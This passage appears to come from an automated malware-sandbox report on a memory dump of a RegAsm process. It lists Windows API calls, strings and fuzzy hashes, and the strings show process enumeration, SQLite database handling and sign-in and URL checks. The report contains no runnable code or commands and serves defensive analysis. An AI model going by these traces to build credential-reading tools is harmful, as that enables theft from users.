                                                                                                                                              • API String ID: 1028950076-4169760276
                                                                                                                                              • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                              • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                              • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                              • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                              • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Library$FreeLoadMessage
                                                                                                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                              • API String ID: 3897320386-317687271
                                                                                                                                              • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                              • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                              • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                              • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                              • API String ID: 4271163124-70141382
                                                                                                                                              • Opcode ID: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                                                                                              • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                              • Opcode Fuzzy Hash: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                                                                                              • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule
                                                                                                                                              • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                              • API String ID: 4139908857-3953557276
                                                                                                                                              • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                              • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                              • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                              • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                              APIs
                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                              • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                              • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                              • memset.MSVCRT ref: 0041BA3D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                              • String ID: -journal$-wal
                                                                                                                                              • API String ID: 438689982-2894717839
                                                                                                                                              • Opcode ID: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
                                                                                                                                              • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                              • Opcode Fuzzy Hash: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
                                                                                                                                              • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                              • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                              • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Item$Dialog$MessageSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3975816621-0
                                                                                                                                              • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                              • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                              • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                              • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                              APIs
                                                                                                                                              • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                              • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                              • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                              • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                              • API String ID: 1214746602-2708368587
                                                                                                                                              • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                              • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                              • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                              • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2313361498-0
                                                                                                                                              • Opcode ID: 6be8936133b9872846cd53c6fbf8727739f7c5809b7a21bfe8b407a08affae9f
                                                                                                                                              • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                              • Opcode Fuzzy Hash: 6be8936133b9872846cd53c6fbf8727739f7c5809b7a21bfe8b407a08affae9f
                                                                                                                                              • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                              APIs
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                              • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                              • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                              • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                              • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2047574939-0
                                                                                                                                              • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                              • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                              • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                              • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                              APIs
                                                                                                                                              • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                              • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                              • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4218492932-0
                                                                                                                                              • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                              • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                              • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                              • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                              • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                              • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                              • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                              • String ID: gj
                                                                                                                                              • API String ID: 438689982-4203073231
                                                                                                                                              • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                              • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                              • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                              • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3212833200-0
                                                                                                                                              • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                              • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                              • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                              • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                              APIs
                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy
                                                                                                                                              • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                              • API String ID: 3510742995-2446657581
                                                                                                                                              • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                              • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                              • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                              • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                              • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                              • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                              • memset.MSVCRT ref: 00405ABB
                                                                                                                                              • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                              • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$FocusItemmemset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4281309102-0
                                                                                                                                              • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                              • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                              • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                              • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _snwprintfwcscat
                                                                                                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                              • API String ID: 384018552-4153097237
                                                                                                                                              • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                              • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                              • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                              • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                              • String ID: 0$6
                                                                                                                                              • API String ID: 2029023288-3849865405
                                                                                                                                              • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                              • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                              • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                              • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                              • memset.MSVCRT ref: 00405455
                                                                                                                                              • memset.MSVCRT ref: 0040546C
                                                                                                                                              • memset.MSVCRT ref: 00405483
                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$memcpy$ErrorLast
                                                                                                                                              • String ID: 6$\
                                                                                                                                              • API String ID: 404372293-1284684873
                                                                                                                                              • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                              • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                              • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                              • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesErrorFileLastSleep$free
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1470729244-0
                                                                                                                                              • Opcode ID: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                                                                                                                                              • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                              • Opcode Fuzzy Hash: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                                                                                                                                              • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                              APIs
                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                              • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                              • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                              • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                              • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                              • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1331804452-0
                                                                                                                                              • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                              • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                              • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                              • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                              • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                              • <%s>, xrefs: 004100A6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$_snwprintf
                                                                                                                                              • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                              • API String ID: 3473751417-2880344631
                                                                                                                                              • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                              • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                              • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                              • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: wcscat$_snwprintfmemset
                                                                                                                                              • String ID: %2.2X
                                                                                                                                              • API String ID: 2521778956-791839006
                                                                                                                                              • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                              • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                              • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                              • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
